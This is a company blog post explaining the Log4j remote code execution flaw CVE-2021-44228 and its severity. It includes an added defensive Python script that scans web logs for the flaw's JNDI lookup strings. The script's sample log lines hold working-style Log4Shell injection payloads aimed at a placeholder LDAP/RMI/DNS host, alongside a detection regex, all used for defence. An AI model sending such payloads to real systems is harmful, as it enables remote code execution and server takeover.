December 16, 2021

What is CVE-2021-44228 or Who the hell is Log4J?

On December 10, 2021, details emerged about a critical remote code execution vulnerability in Apache Log4j, assigned CVE-2021-44228, which can be triggered by any remote user who can cause specially crafted strings to be processed by an application’s Log4j logging layer. It takes advantage of Log4j resolving LDAP and JNDI (Java Naming and Directory Interface) lookup requests embedded in logged data without checking them, so an attacker may be able to execute code and thereby take control of the server or local machine hosting the affected application.
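To make that mechanism concrete from the defender's side, here is an added example (not from the original post or from Device Authority) that scans web-server access-log lines for the `${jndi:...}` lookup strings described above and reports which client and which request field carried them. The log lines, IP addresses and hostnames are constructed placeholders.

```python
import re
from dataclasses import dataclass

# Matches a Log4j JNDI lookup such as ${jndi:ldap://host/path}; Log4j treats the
# lookup name case-insensitively, so the pattern does too.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

@dataclass(frozen=True)
class Finding:
    line_no: int
    client_ip: str
    field: str    # request part that carried the lookup (request, referer, agent)
    scheme: str   # JNDI provider scheme, e.g. ldap, rmi, dns

def find_jndi_lookups(lines):
    """Return one Finding per JNDI lookup found in any logged request field.

    Every field is scanned, not just the URL: Log4j evaluates lookups wherever
    the string ends up in a log message, including headers such as User-Agent.
    """
    findings = []
    for n, line in enumerate(lines, start=1):
        m = COMBINED.match(line)
        if not m:
            continue  # unparseable line; a real tool would count these separately
        for field in ("request", "referer", "agent"):
            for hit in JNDI_LOOKUP.finditer(m.group(field)):
                findings.append(Finding(n, m.group("ip"), field, hit.group(1).lower()))
    return findings

# Constructed sample lines (not real traffic); hostnames are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login?user=${jndi:ldap://placeholder.example/a} HTTP/1.1" 200 77 "-" "curl/7.79"',
    '198.51.100.4 - - [10/Dec/2021:14:03:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${JNDI:rmi://placeholder.example/b}"',
    '198.51.100.5 - - [10/Dec/2021:14:03:30 +0000] "POST /api HTTP/1.1" 403 0 "-" "Mozilla/5.0 (${jndi:dns://placeholder.example/c})"',
]

if __name__ == "__main__":
    for f in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.client_ip} sent a jndi:{f.scheme} lookup via {f.field}")
```

A hit in the log only shows that a lookup string was received, not that the application was vulnerable; treat it as a trigger to check the Log4j version on that host and review outbound LDAP/RMI/DNS traffic from it.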

The official security advisory from Apache can be found here: https://logging.apache.org/log4j/2.x/security.html

But it is important to understand just how severe this is. As our CTO mentioned on the day it was announced, Heartbleed (https://www.cve.org/CVERecord?id=CVE-2014-0160), an OpenSSL vulnerability that affected a large proportion of web traffic, was categorised as a 7.5.

Log4J is categorised as a 10. A perfect 10.

The fact that this can affect everything from Minecraft (popular MMO game) to Microsoft & Amazon to Apple gives you a sense of the scale of the potential impact. CISA (the Cybersecurity and Infrastructure Security Agency, part of the Department of Homeland Security) says that Log4J will affect hundreds of millions of devices and that “no single action will fix the issue”.

Basically, if you or your software/service write a log for anything, you should check your status. It potentially affects everyone, and I mean everyone!!

At Device Authority we acted swiftly to remediate the impact of Log4J and have published the following article:

https://deviceauthority.zendesk.com/hc/en-us/articles/4416472199181-Mitigating-log4j-vulnerability-CVE-2021-44228

If you have any questions or doubts about KeyScaler and Log4J then reach out today so that we can understand your concerns.

Act now, stay safe!!

WRITTEN BY
Paul Lockley